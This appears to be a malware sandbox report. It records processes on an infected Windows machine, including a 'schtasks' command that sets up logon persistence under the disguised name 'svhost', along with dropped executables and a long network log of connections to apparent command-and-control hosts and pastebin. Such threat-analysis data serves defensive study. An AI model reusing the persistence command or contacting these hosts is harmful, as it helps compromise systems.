"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j1goxeU1EauG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOhLQcJh0MZU.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rTQ5Dc2zbKug.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| N/A | 127.0.0.1:49827 | | tcp |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 151.101.67.19:443 | www.mozilla.org | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| N/A | 127.0.0.1:49836 | | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 34.149.128.2:443 | support.mozilla.org | tcp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 172.169.87.222:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| GB | 104.91.71.146:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | improving.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| GB | 23.37.198.97:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.65:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | s-part-0037.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | tcp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | tcp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
| NL | 2.18.121.73:80 | ciscobinary.openh264.org | tcp |
| US | 52.182.143.210:443 | onedscolprdcus10.centralus.cloudapp.azure.com | tcp |
| US | 52.182.143.210:443 | onedscolprdcus10.centralus.cloudapp.azure.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus10.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdgwc02.germanywestcentral.cloudapp.azure.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus11.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 20.189.173.10:443 | onedscolprdwus09.westus.cloudapp.azure.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus09.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus09.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdweu12.westeurope.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdweu12.westeurope.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| GB | 23.37.198.97:443 | e13636.dscb.akamaiedge.net | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 8.8.8.8:53 | s-part-0037.t-0009.t-msedge.net | udp |
| US | 13.107.246.65:443 | s-part-0037.t-0009.t-msedge.net | tcp |
| US | 13.107.246.65:443 | s-part-0037.t-0009.t-msedge.net | tcp |
| US | 8.8.8.8:53 | onedscolprdwus12.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | download.sysinternals.com | udp |
| US | 13.107.246.65:443 | download.sysinternals.com | tcp |
| GB | 104.91.71.146:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | onedscolprdwus10.westus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| CN | 8.141.166.236:10020 | | tcp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| VN | 103.167.89.125:80 | | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| RU | 45.90.34.133:80 | pb.agnt.ru | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| TR | 94.156.177.33:80 | | tcp |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| N/A | 127.0.0.1:1504 | | tcp |
| TR | 94.156.177.33:80 | | tcp |
| US | 73.62.14.5:4782 | | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| GB | 104.91.71.146:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | downsexv.com | udp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 104.21.32.1:80 | downsexv.com | tcp |
| KR | 152.67.212.187:443 | | tcp |
| US | 8.8.8.8:53 | rappel-coinbase.com | udp |
| RU | 91.202.233.151:80 | rappel-coinbase.com | tcp |
| HK | 47.240.68.28:81 | coach.028csc.com | tcp |
| US | 8.8.8.8:53 | clammypunero.com | udp |
| US | 8.8.8.8:53 | toppyneedus.biz | udp |
| US | 8.8.8.8:53 | skirtgrippys.com | udp |
| US | 8.8.8.8:53 | plasticreie.com | udp |
| US | 8.8.8.8:53 | cabbagepattof.net | udp |
| US | 8.8.8.8:53 | believezioep.com | udp |
| US | 8.8.8.8:53 | garderjjerop.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | hopeefreamed.com | udp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| KR | 152.67.212.187:443 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 73.62.14.5:4782 | | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.21.61.41:443 | hopeefreamed.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | b46.oss-cn-hongkong.aliyuncs.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| HK | 47.79.64.225:443 | b46.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| KR | 152.67.212.187:443 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
